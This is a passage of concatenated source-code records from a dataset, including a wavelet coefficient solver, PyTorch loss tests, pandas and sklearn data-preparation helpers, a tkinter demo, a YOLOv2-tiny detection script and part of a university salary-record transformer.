range(d2):\n for j in range(-(N-2), (N-2)+1):\n if (j, k) in Tindices:\n M[q, idx(j, k)] += moment(a, j, q)\n A = np.vstack([T,M])\n b = np.hstack([b, np.zeros([d2])])\n\n\n M = np.zeros([d3, len(Tindices)])\n j = 0 if (d2 % 2) == 1 else 1\n \n for q in range(d3):\n for k in range(-(N-2), (N-2)+1):\n if (j, k) in Tindices:\n M[q, idx(j, k)] += moment(a, k, q)\n A = np.vstack([A,M])\n b = np.hstack([b, np.zeros([d3])])\n\n \n \"\"\"\n Since the eigenvector is determined up to a constant, we alse need a \n normalization equation ( Latto et al, 1992):\n \"\"\"\n M = np.zeros([1, len(Tindices)])\n for j,k in itertools.product(range(-(N-2), (N-2)+1), repeat=2):\n if (j, k) in Tindices:\n M[0, idx(j, k)] += moment(a, j, d2)*moment(a, k, d3)\n \n A = np.vstack([A,M])\n b = np.hstack([b, [factorial(d2)*factorial(d3)]])\n\n\n \"\"\"\n A least squares algorithm is used to solve the over-determined system.\n One can also use np.linalg.lstsq with rcond = None. 
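(For an over-determined system, scipy.linalg.lstsq returns the residual as the squared 2-norm of b - A x.) 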
In my experience \n however, np.linalg.lstsq does not always return residuals correctly.\n \"\"\"\n CC, residuals, rank, singular_values = scipy.linalg.lstsq( A,b)\n\n if abs( residuals ) >= 10**-20:\n msg = 'Residue of lstsq algorithm is {:.2e}!'.format(residuals)\n warnings.warn(msg)\n\n return idx, Tindices, CC\n\n","sub_path":"Wavelet/CC3.py","file_name":"CC3.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"629191005","text":"import unittest\n\nimport torch\nimport torch.nn.functional as F\n\nfrom deepclustering.loss import loss\nfrom deepclustering.loss.IID_losses import IIDLoss\nfrom deepclustering.utils import simplex\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\nclass Test_CrossEntropyLoss2D(unittest.TestCase):\n def setUp(self):\n self.weight = torch.Tensor([1, 2, 3, 4])\n self.loss = loss.CrossEntropyLoss2d\n self.predict = torch.randn(10, 4, 224, 224)\n b, c, h, w = self.predict.shape\n self.label = torch.randint(0, 4, size=(b, h, w))\n\n def test_weight(self):\n self.criterion = self.loss(weight=self.weight)\n loss = self.criterion(self.predict, self.label)\n # assert loss ==1\n\n def test_cuda(self):\n for arg in self.__dict__:\n if isinstance(arg, torch.Tensor):\n arg = arg.to(\"cpu\")\n\n self.weight = self.weight.to(device)\n self.predict = self.predict.to(device)\n self.label = self.label.to(device)\n self.test_weight()\n\n\nclass Test_IIC(unittest.TestCase):\n def setUp(self) -> None:\n self.x1 = F.softmax(torch.randn(1, 10), 1)\n self.x2 = F.softmax(torch.randn(1, 10), 1)\n assert simplex(self.x1)\n assert simplex(self.x2)\n\n def test_iic(self):\n criterion = IIDLoss(lamb=1.0)\n loss = criterion(self.x1, self.x2)\n with self.assertRaises(AssertionError):\n loss = criterion(self.x1, torch.randn(5, 10))\n\n def test_iic2(self):\n criterion = IIDLoss(1.0)\n loss1, _ = criterion(self.x1, self.x1)\n loss2, _ = criterion(self.x2, self.x1)\n loss3, _ = criterion(self.x1, self.x2)\n assert loss2 == loss3\n","sub_path":"test/deepclustering/loss/test_loss.py","file_name":"test_loss.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"19390494","text":"# Basic modules for dataframe manipulation\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.pipeline import Pipeline\nfrom scipy import stats\nfrom scipy.stats import iqr, norm, skew\nfrom scipy.special import boxcox1p\nfrom pandas.api.types import is_string_dtype, is_numeric_dtype, is_categorical_dtype\nimport math\n\n\ndef lower_cols(dataframe):\n\t\"\"\"\n\tFunction used to convert column headings to lower case\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\tdataframe.columns = [x.lower() for x in dataframe.columns]\n\n\ndef obj_to_cat(dataframe):\n \"\"\"\n\tFunction used to convert objects(strings) into categories\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\n for n, c in dataframe.items():\n if is_string_dtype(c):\n dataframe[n] = c.astype('category').cat.as_ordered()\n return dataframe\n\t\n\n\ndef 
fill_missing_nums(dataframe):\n    \"\"\"\n    Function used to impute missing numerical values with column's median\n\t\n    Parameters:\n\t\n    dataframe - just as the parameter name implies, expects dataframe object\n\t\n    \"\"\"\n    for n, c in dataframe.items(): \n        if is_numeric_dtype(c):\n            if pd.isnull(c).sum() > 0:\n                dataframe.loc[:,n] = c.fillna(c.median())\n    return dataframe\n\n\ndef fill_missing_cats(dataframe):\n    \"\"\"\n    Function used to impute missing categorical values with column's mode\n\t\n    Parameters:\n\t\n    dataframe - just as the parameter name implies, expects dataframe object\n\t\n    \"\"\"\n    for n, c in dataframe.items():\n        if is_categorical_dtype(c):\n            if pd.isnull(c).sum() > 0:\n                dataframe.loc[:,n] = c.fillna(c.mode()[0])\n    return dataframe\n\t\n\n\ndef display_cols(dataframe, type = 'category', num_samples = 7):\n\t\"\"\"\n\tFunction used to display columns of desired data type\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\ttype - data type we are looking for\n\tnum_samples - number of rows to display\n\t\n\t\"\"\"\n\tmask = dataframe.dtypes == type\n\treturn dataframe.loc[:, mask].sample(num_samples)\n\t\n\n\ndef display_nums_stats(dataframe):\n    \"\"\"\n    Function used to calculate basic statistics of numerical columns.\n\t\n    Parameters:\n\t\n    dataframe - just as the parameter name implies, expects dataframe object\n\t\n    \"\"\"\n\n    numericals = []\n    for n, c in dataframe.items():\n        if is_numeric_dtype(c):\n            numericals.append(n)\n    return dataframe[numericals].describe()\n\n\n\t\ndef outliers_by_col(dataframe, train_last_idx , multiplier = 1.5, plot_results = True, outliers_dictionary = False):\n\t\"\"\"\n\tFunction used to determine outliers in each column.\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tmultiplier - value used for calculating Tukey's Interquartile Range. By default we assume that all values lower than Q1 - (1.5 * IQR) or greater than Q3 + (1.5 * IQR) are outliers\n\tplot_results - by default set to True. As a result boxplots for all columns with outliers will be plotted\n\toutliers_dictionary - by default set to False. If True, dictionary with column names as keys and lists of row indexes containing outliers as values will be returned \n\t\n\t\"\"\"\n\t\n\toutliers_dict = {}\n\tfor column in dataframe.columns:\n\t\t\tif is_numeric_dtype(dataframe[column][:train_last_idx]):\n\t\t\t\tiq_range = iqr(dataframe[column][:train_last_idx])\n\t\t\t\tq1 = np.percentile(dataframe[column][:train_last_idx], 25)\n\t\t\t\tq3 = np.percentile(dataframe[column][:train_last_idx], 75)\n\t\t\t\tlower_bound = q1 - (multiplier * iq_range)\n\t\t\t\tupper_bound = q3 + (multiplier * iq_range)\n\t\t\t\tselect_indices = list(np.where((dataframe[column][:train_last_idx] < lower_bound) | (dataframe[column][:train_last_idx] > upper_bound))[0])\n\t\t\t\tif len(select_indices) > 0 :\n\t\t\t\t\toutliers_dict[column] = select_indices\n\n\t\n\tif plot_results == True:\n\t\tdisplay_plots(dataframe[:train_last_idx], outliers_dict.keys(), kind = 'box', figsize = (20,10))\n\t\t\n\tif outliers_dictionary == True:\n\t\treturn outliers_dict\n\n\n\n\t\ndef nominalnums_to_cat(dataframe, unique_values_split = 30, boundary = 10):\n\t\"\"\"\n\tFunction for converting nominal numerical features into categorical variables. 
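A numeric column with only a handful of distinct values, e.g. a quality rating coded 1-10, usually encodes a category rather than a true quantity. 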
\n\t\n\tParameters:\n\t\n\tdataframe -just as the parameter name implies, expects dataframe object\n\tunique_values_split - number of unique values to treat a variable as a categorical one. By default, variable's data type will be changed to 'category' if it has less than 30 unique values\n\tboundary - decision boundary determining which variable names will be returned in list for further check. By default, all variables which take more than 10 unique values will be returned\n\t\n\t\"\"\"\n\tcols_to_verify = []\n\tfor col in dataframe.columns:\n\t\tif is_numeric_dtype(dataframe[col]):\n\t\t\tlength = len(dataframe[col].value_counts())\n\t\t\tif ((length < unique_values_split) and ('area' not in col)):\n\t\t\t\tdataframe[col] = dataframe[col].astype('category')\n\t\t\t\tif (length > boundary):\n\t\t\t\t\tcols_to_verify.append(col)\n\treturn(cols_to_verify)\n\t\n\ndef display_plots(dataframe, columns, kind = 'count', figsize = (20,10)):\n\t\"\"\"\n\tFunction for plotting suspicious categorical columns.\n\n\tParameters:\n\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tcolumns - list of columns or dictionary keys, e.g. list of columns returned by 'nominalnums_to_cat' function\n\tkind - by default set to 'count' to display countplots for given columns. If 'box' will be used as a value then function will display box plots. \n\n\t\"\"\"\n\t\n\tlength = len(columns)\n\tif length <= 6:\n\t\tplt.figure(figsize=figsize)\n\telif length > 6 and length <= 12:\n\t\tplt.figure(figsize = next((x, int(y*2)) for x,y in [figsize]))\n\telif length > 12 and length <= 18:\n\t\tplt.figure(figsize = next((x, int(y*3)) for x,y in [figsize]))\n\telif length > 18 and length <= 24:\n\t\tplt.figure(figsize = next((x, int(y*4)) for x,y in [figsize]))\n\telif length > 24 and length <= 30:\n\t\tplt.figure(figsize = next((x, int(y*5)) for x,y in [figsize]))\t\n\tfor ix, col in enumerate(columns):\n\t\tplt.subplot(np.ceil(length/3), 3, ix+1)\n\t\tif kind == 'count':\n\t\t\tsns.countplot(dataframe[col])\n\t\telif kind == 'box':\n\t\t\tsns.boxplot(dataframe[col])\n\t\telif kind == 'dist':\n\t\t\tsns.distplot(dataframe[col], fit = norm)\n\t\t\t\n\t\t\t\ndef binarize_numericals(dataframe, columns):\n\t\"\"\"\n\tFunction for creating binomial categorical variables from unequally distributed numerical variables, all values equal to 0 will be denoted as 0 and those greater than 0 will be marked as 1. 
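This suits heavily zero-inflated columns, where the presence of a feature is more informative than its magnitude. 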
After conversion, all input variables will be dropped from dataframe.\n\n\tParameters:\n\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tcolumns - list of columns or dictionary keys to convert\n\n\t\"\"\"\n\tfor col in columns:\n\t\tdataframe[col+'_bin'] = np.where(dataframe[col] > 0, 1, 0)\n\t\tdataframe[col+'_bin'] = dataframe[col+'_bin'].astype('category')\n\n\tdataframe.drop(labels= columns, axis=1, inplace = True)\n\n\t\t\n\t\t\ndef get_codes(dataframe):\n\t\"\"\"\n\tFunction for converting values of categorical variables into numbers.\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\tfor column in dataframe.columns:\n\t\tif is_categorical_dtype(dataframe[column]):\n\t\t\tdataframe[column] = dataframe[column].cat.codes\n\t\t\t\n\ndef rmsle(y, y_pred):\n return np.sqrt(mean_squared_error(y, y_pred))\n\n\ndef rmse(x,y): return math.sqrt(((x-y)**2).mean())\n\n\ndef rmsle_cv(model, trainingset, target, n_folds):\n\t\n rmse= np.sqrt(-cross_val_score(model, trainingset, target, scoring=\"neg_mean_squared_error\", cv = n_folds, n_jobs = -1))\n return(rmse)\n\t\n\ndef print_score(model, trainingset, target, scoring_func = 'rmse', n_folds = None):\n\t\"\"\"\n\tFunction used for checking the accuracy of the regression model.\n\t\n\tParameters:\n\t\n\tmodel -just as the parameter name implies, expects model object\n\ttrainingset - training dataset\n\ttarget - target variable\n\tscoring_func - scoring function to assess the model's performance. By default RMSE will be used\n\t\n\t\"\"\"\n\tif scoring_func == 'rmse':\n\t\tX_train, X_val, y_train, y_val = train_test_split(trainingset, target, test_size = 0.2, random_state = 123, shuffle = True)\n\t\tres = [rmse(model.predict(X_train), y_train), rmse(model.predict(X_val), y_val), model.score(X_train, y_train), model.score(X_val, y_val)]\n\t\tprint('Training RMSE: {0:.3f} | Testing RMSE: {1:.3f} | Training R^2: {2:.3f} | Testing R^2: {3:.3f}'.format(res[0], res[1], res[2], res[3]))\n\t\n\telif scoring_func == 'rmsle':\n\t\tX_train, X_val, y_train, y_val = train_test_split(trainingset, target, test_size = 0.2, random_state = 123, shuffle = True)\n\t\tres = [rmsle(model.predict(X_train), y_train), rmsle(model.predict(X_val), y_val), model.score(X_train, y_train), model.score(X_val, y_val)]\n\t\tprint('Training RMSLE: {0:.3f} | Testing RMSLE: {1:.3f} | Training R^2: {2:.3f} | Testing R^2: {3:.3f}'.format(res[0], res[1], res[2], res[3]))\n\t\t\n\telif scoring_func == 'rmsle_cv':\t\n\t\tif isinstance(trainingset, np.ndarray) & isinstance(target, np.ndarray):\n\t\t\tn_folds = n_folds\n\t\t\tkf = KFold(n_folds, shuffle=True, random_state=123).get_n_splits(trainingset)\n\t\t\tres = rmsle_cv(model, trainingset, target, n_folds )\n\t\t\tmodel = model.fit(trainingset, target)\n\t\t\tprint('Average cross-validated RMSE: {0:.4f} | Standard Deviation of RMSE: {1:.4f} | Training R^2: {2:.3f}'.format(res.mean(), res.std(), model.score(trainingset, target)))\n\t\t\t\n\t\telse:\n\t\t\tn_folds = n_folds\n\t\t\tkf = KFold(n_folds, shuffle=True, random_state=123).get_n_splits(trainingset.values)\n\t\t\tres = rmsle_cv(model, trainingset, target, n_folds )\n\t\t\tmodel = model.fit(trainingset, target)\n\t\t\tprint('Average cross-validated RMSE: {0:.4f} | Standard Deviation of RMSE: {1:.4f} | Training R^2: {2:.3f}'.format(res.mean(), res.std(), model.score(trainingset, target)))\n\t\t\t\n\t\t\n\t\t\n\t\ndef plot_feat_imp(model, dataframe, boundary = 15, best_features = 
False):\n\n\t\"\"\"\n\tFunction used for plotting the most important features found by model.\n\t\n\tParameters:\n\t\n\tmodel - just as the parameter name implies, expects model object\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tboundary - number of features we would like to plot\n\t\n\t\"\"\"\n\tindices = np.argsort(model.feature_importances_)[::-1][:boundary]\n\tbest_features_list = [col for col in dataframe.columns[indices]]\n\n\tfig = plt.figure(figsize=(9, 12))\n\tp = sns.barplot(y=dataframe.columns[indices][:boundary], x = model.feature_importances_[indices][:boundary], orient='h')\n\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\tp.set_ylabel(\"Features\",fontsize=12)\n\tp.tick_params(labelsize=10)\n\tp.set_title(\"Feature importances\")\n\tfor i, v in enumerate(model.feature_importances_[indices][:boundary]):\n\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', fontweight='bold')\n\n\tplt.show()\n\t\n\tif best_features == True:\n\n\t\treturn best_features_list\n\t\n\t\ndef drop_best_feats(model, features, X, y, scoring_func):\n\t\"\"\"\n\tFunction used to evaluate the performance of a model without best features. In each iteration model is dropping one of the best features.\n\t\n\tParameters:\n\t\n\tmodel - just as the parameter name implies, expects model object\n\tfeatures - list of features to drop\n\tX - training features vector\n\ty - training target vector\n\tscoring_func - function to be used for evaluation: 'rmse' or 'rmsle' \n\t\n\t\"\"\"\n\tfor feature in features:\n\t\tX_sub = X.drop(feature, axis = 1)\n\t\tX_train, X_val, y_train, y_val = train_test_split(X_sub, y, test_size = 0.2, random_state = 123, shuffle = False)\n\t\tmodel.fit(X_train, y_train)\n\t\tprint('Dropped feature: {} '.format(feature))\n\t\t# print_score expects (model, trainingset, target) and performs its own train/validation split internally\n\t\tprint_score(model, X_sub, y, scoring_func = scoring_func)\n\t\tprint('\\n')\n\n\t\t\ndef plot_distqq(x, dataframe):\n\t\"\"\"\n\tFunction used to plot distribution of the desired numerical variable with normal distribution overlaid and quantile-quantile plot.\n\t\n\tParameters:\n\t\n\tx - numerical variable to plot\n\tdataframe - just as the name implies, expects dataframe object\n\n\t\n\t\"\"\"\n\n\tsns.distplot(dataframe[x], fit = norm)\n\t# Get the fitted parameters used by the function\n\tmu, sigma = norm.fit(dataframe[x])\n\t\n\t# Now plot the distribution\n\tplt.legend(['Normal distribution ($\\mu=$ {:.2f} and $\\sigma=$ {:.2f} )'.format(mu, sigma)], loc='best')\n\tplt.ylabel('Frequency')\n\tplt.title('{} distribution'.format(x))\n\t\n\t#Get also the QQ-plot\n\tfig = plt.figure()\n\tres = stats.probplot(dataframe[x], plot=plt)\n\tplt.show()\n\t\n\ndef percent_missing(dataframe, ascending = False, quantity = 30):\n\t\"\"\"\n\tFunction used to calculate the percentage of missing data. As a result returns dataframe.\n\t\n\tParameters:\n\t\n\tdataframe - expects dataframe object\n\tascending - whether values should be sorted in ascending or descending order. 
By default the dataframe is sorted in descending order.\n\tquantity - number of variables to display\n\n\t\n\t\"\"\"\n\tmissing = (dataframe.isnull().sum() / len(dataframe)) * 100\n\tmissing = missing.drop(missing[missing == 0].index).sort_values(ascending = ascending) [:quantity]\n\tmissing = pd.DataFrame({'Missing Ratio' : missing})\n\treturn missing\n\n\t\ndef plot_bar(x, y, xlabel, ylabel, title, figsize = (12, 8)):\n\t\"\"\"\n\tFunction used to display a barplot of desired variables.\n\t\n\tParameters:\n\t\n\tx - feature variable\n\ty - values of desired feature variable\n\tfigsize - plot size. By default width = 12 and height = 8\n\txlabel - just as the name implies, expects label for x-axis\n\tylabel - just as the name implies, expects label for y-axis\n\ttitle - just as the name implies, expects plot title\n\n\t\n\t\"\"\"\n\n\tf, ax = plt.subplots(figsize = figsize)\n\tplt.xticks(rotation = '90')\n\tsns.barplot(x = x, y = y)\n\tplt.xlabel(xlabel, fontsize = 13)\n\tplt.ylabel(ylabel, fontsize = 13)\n\tplt.title(title, fontsize = 13)\n\t\ndef calculate_skewness(dataframe):\n\t\"\"\"\n\tFunction used to calculate skewness across numerical features. As a result returns dataframe.\n\t\n\tParameters:\n\t\n\tdataframe - just as the name implies, expects dataframe object\n\t\n\t\"\"\"\n\n\tnumeric_feats = dataframe.dtypes[(dataframe.dtypes != \"category\") & (dataframe.dtypes != \"object\")].index\n\t# Check the skew of all numerical features\n\tskewed_feats = dataframe[numeric_feats].apply(lambda x: skew(x.dropna())).sort_values(ascending=False)\n\tskewness = pd.DataFrame({'Skewness' :skewed_feats})\n\treturn skewness\n\t\n\ndef box_cox_transform(dataframe, skewnesses, lamb):\n\t\"\"\"\n\tFunction used to apply box-cox transformation for highly skewed features to make them look more normally distributed.\n\t\n\tParameters:\n\t\n\tdataframe - just as the name implies, expects dataframe object\n\tskewnesses - expects dataframe object with calculated skewnesses. Use output from the 'calculate_skewness' function.\n\tlamb - lambda value to be used with the box-cox transformation. By default boxcox1p is used as it is better for smaller x values. 
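Concretely, boxcox1p(x, lamb) computes ((1 + x)**lamb - 1) / lamb for lamb != 0, so zero-valued observations remain valid inputs. 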
Setting lamb = 0 is equivalent to log1p.\n\t\n\t\"\"\"\n\t\n\tskewness = skewnesses[abs(skewnesses) > 0.75]\n\tskewed_features = skewness.index\n\tlamb = lamb \n\tfor feature in skewed_features:\n\t\tdataframe[feature] = boxcox1p(dataframe[feature], lamb)\n\t\t\n\nclass AveragedScorer(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, models):\n self.models = models\n \n # we define clones of the original models to fit the data in\n def fit(self, X, y):\n self.models_ = [clone(x) for x in self.models]\n \n # Train cloned base models\n for model in self.models_:\n model.fit(X, y)\n\n return self\n \n #Now we do the predictions for cloned models and average them\n def predict(self, X):\n predictions = np.column_stack([\n model.predict(X) for model in self.models_\n ])\n return np.mean(predictions, axis=1) \n\t\t\n\t\t\nclass StackedAveragedScorer(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=123)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n #Do the predictions of all base models on the test data and use the averaged predictions as \n #meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_ ])\n return self.meta_model_.predict(meta_features)\n\t\t\n\t\t\ndef reg_importances(model, dataframe, boundary = None, plot = False, figsize = (9, 24), step_name = None):\n\t\n\t\n\t\"\"\"\n\tFunction used for plotting the most important features found by regression model.\n\t\n\tParameters:\n\t\n\tmodel - trained model \n\tdataframe - just as the parameter name implies, expects dataframe object\n\tboundary - number of features we would like to return/plot. By default all features with absolute value > 0 will be returned\n\tplot - whether to plot feature importances or not. By default \"False\"\n\tfigsize - just as the parameter name implies, enables customizing plot size. 
By default width = 9 and height = 24\n\tstep_name - argument required if model was used in Pipeline object hence is of Pipeline type and expects exact step name to retrieve coefficients\n\t\n\t\"\"\"\n\n\t\n\t\n\tif isinstance(model, Pipeline):\n\t\tcoefs_pos = [coef for coef in model.named_steps[step_name].coef_ if coef > 0]\n\t\tcoefs_neg = [coef for coef in model.named_steps[step_name].coef_ if coef < 0]\n\t\t\n\t\tif boundary == None:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.named_steps[step_name].coef_ > 0]).sort_values('Importance', ascending = False)\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.named_steps[step_name].coef_ < 0]).sort_values('Importance', ascending = True)\n\t\telse:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.named_steps[step_name].coef_ > 0]).sort_values('Importance', ascending = False)[:boundary]\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.named_steps[step_name].coef_ < 0]).sort_values('Importance', ascending = True)[:boundary]\n\t\t\t\n\telse:\n\t\tcoefs_pos = [coef for coef in model.coef_ if coef > 0]\n\t\tcoefs_neg = [coef for coef in model.coef_ if coef < 0]\n\t\t\n\t\tif boundary == None:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.coef_ > 0]).sort_values('Importance', ascending = False)\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.coef_ < 0]).sort_values('Importance', ascending = True)\n\t\telse:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.coef_ > 0]).sort_values('Importance', ascending = False)[:boundary]\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.coef_ < 0]).sort_values('Importance', ascending = True)[:boundary]\n\t\n\tif plot == True:\n\t\tfig = plt.figure(figsize = figsize)\n\t\tplt.subplot(211)\t\n\t\tp = sns.barplot(y= pos_imps.index, x = pos_imps['Importance'], orient='h')\n\t\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\t\tp.set_ylabel(\"Features\",fontsize=12)\n\t\tplt.title(\"Positive importances\")\n\t\tfor i, v in enumerate(pos_imps['Importance']):\n\t\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', fontweight='bold')\n\t\t\t\n\t\t\n\t\tplt.subplot(212)\n\t\tp = sns.barplot(y=neg_imps.index, x = neg_imps['Importance'], orient='h')\n\t\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\t\tp.set_ylabel(\"Features\",fontsize=12)\n\t\tplt.title(\"Negative importances\")\n\n\t\tfor i, v in enumerate(neg_imps['Importance']):\n\t\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', ha = 'right', fontweight='bold')\n\t\t\t\n\t\tplt.subplots_adjust(top = 0.9)\n\t\tplt.show()\n\t\t\n\treturn pos_imps, neg_imps\n\t\t\n\n\ndef plot_counts(dataframe, x, hue = None, boundary = None, ascending = None, figsize = (12,8), xlabel = 'Feature', ylabel = 'Counts', title = '', fontsize = 13, rotation = None, palette = None):\n \"\"\"\n Function used to display a countplot of desired variables.\n\n Parameters:\n \n dataframe = just as the name implies, expects datatframe object\n x - feature variable\n hue - categorical variable in data to map plot aspects to different colors\n boundary - number of unique feature values to display. By default set to None. 
Useful when there are dozens of possible values\n ascending - used when boundary is specified. By default set to None as order depends on order of the hue variable. \n figsize - plot size. By default width = 12 and height = 8\n xlabel - just as the name implies, expects label for x-axis\n ylabel - just as the name implies, expects label for y-axis\n title - just as the name implies, expects plot title\n\n \"\"\"\n f, ax = plt.subplots(figsize = figsize)\n \n if palette != None:\n sns.set_palette(palette)\n else:\n sns.set_palette(palette = None)\n if (boundary != None) & (ascending == False): \n sns.countplot(x = x, hue = hue, data = dataframe, order = dataframe[x].value_counts().iloc[:boundary].index)\n elif (boundary != None) & (ascending == True):\n sns.countplot(x = x, hue = hue, data = dataframe, order = dataframe[x].value_counts(ascending = True).iloc[:boundary].index)\n else:\n sns.countplot(x = x, hue = hue, data = dataframe)\n \n if rotation != None:\n plt.xticks(rotation = rotation)\n plt.xlabel(xlabel, fontsize = fontsize)\n plt.ylabel(ylabel, fontsize = fontsize)\n plt.title(title, fontsize = fontsize)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":22787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"200429642","text":"#!/usr/bin/env python3\n\nfrom tkinter import ttk\nimport tkinter as tk\n\nroot = tk.Tk()\nmain = ttk.Frame(root)\nmain.pack(side=\"left\",fill=\"both\",expand=True)\n\ntk.Label(root,text=\"Label Top\",bg=\"green\").pack(side=\"top\",expand=\"True\",fill=\"both\")\ntk.Label(root,text=\"Label Top\",bg=\"blue\").pack(side=\"top\",expand=\"True\",fill=\"both\")\ntk.Label(root,text=\"Label Left\",bg=\"yellow\").pack(side=\"left\",expand=True,fill=\"both\")\n\nroot.mainloop()","sub_path":"Python-GUI/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"493768491","text":"import sys\nimport numpy as np\nimport cv2\nimport time\n\nimport yolov2tiny\n\ndef resize_input(im):\n imsz = cv2.resize(im, (416, 416))\n imsz = imsz / 255.\n imsz = imsz[:,:,::-1]\n return np.asarray(imsz, dtype=np.float32)\n\ndef image_object_detection(in_image, out_image, debug):\n frame = cv2.imread(in_image)\n\n y2t = yolov2tiny.YOLO_V2_TINY([1, 416, 416, 3], \"../y2t_weights.pickle\", debug)\n\n t_end2end = time.time() \n\n _frame = resize_input(frame)\n _frame = np.expand_dims(_frame, axis=0)\n\n t_inference = time.time()\n tout = y2t.inference(_frame)\n t_inference = time.time() - t_inference\n\n tout = np.squeeze(tout)\n boxes = yolov2tiny.postprocessing(tout)\n frame = cv2.resize(frame, (416, 416), interpolation = cv2.INTER_CUBIC)\n\n for b in boxes:\n print(b[1], b[2], b[3])\n frame = cv2.rectangle(frame, b[1], b[2], b[3])\n cv2.putText(frame, b[0], (int(min(b[1][0], b[2][0]) - 1), int(min(b[1][1], b[2][1])) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, b[3], 1)\n\n t_end2end = time.time() - t_end2end\n\n cv2.imwrite(out_image, frame)\n\n print('DNN inference elapsed time: %.3f' % t_inference)\n print('End-to-end elapsed time : %.3f' % t_end2end)\n\ndef main():\n if len(sys.argv) < 4 or sys.argv[3] not in ('-DEBUG', '-NDEBUG'):\n print (\"Usage: python3 __init__.py [in_image] [out_image] [-DEBUG/NDEBUG]\")\n sys.exit()\n image_in = sys.argv[1] \n image_out = sys.argv[2] \n debug = True if sys.argv[3] == '-DEBUG' 
else False\n\n if debug:\n print('Debug mode enabled')\n\n image_object_detection(image_in, image_out, debug)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cs492-projects/proj3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"328870781","text":"from . import base\nfrom . import mixins\n\n\nclass TransformedRecord(mixins.GenericCompensationMixin,\n mixins.GenericDepartmentMixin,\n mixins.GenericJobTitleMixin,\n mixins.MembershipMixin,\n mixins.OrganizationMixin,\n mixins.PostMixin,\n base.BaseTransformedRecord):\n MAP = {\n 'department': 'Department ',\n 'name': 'Name',\n 'job_title': 'Title',\n 'last_name': 'Last Name',\n 'hire_date': 'Hire Date',\n 'pay_status': 'FT or PT Status',\n 'compensation': 'Annual Salary',\n 'race': 'Race', # Not used yet, need to allow multiple\n 'system_status': 'COA',\n }\n\n NAME_FIELDS = ('name', )\n ORGANIZATION_NAME = 'Texas Tech University{suffix}'\n\n # All employees are full-time right now\n compensation_type = 'Full Time'\n\n @property\n def is_valid(self):\n return bool(self.race.strip())\n\n @property\n def is_system(self):\n return self.system_status == 'S'\n\n @property\n def organization_name(self):\n suffix = ' System' if self.is_system else ''\n return self.ORGANIZATION_NAME.format(suffix=suffix)\n\n @property\n def organization(self):\n return {\n 'name': self.organization_name,\n 'children': self.department_as_child,\n }\n\n @property\n def 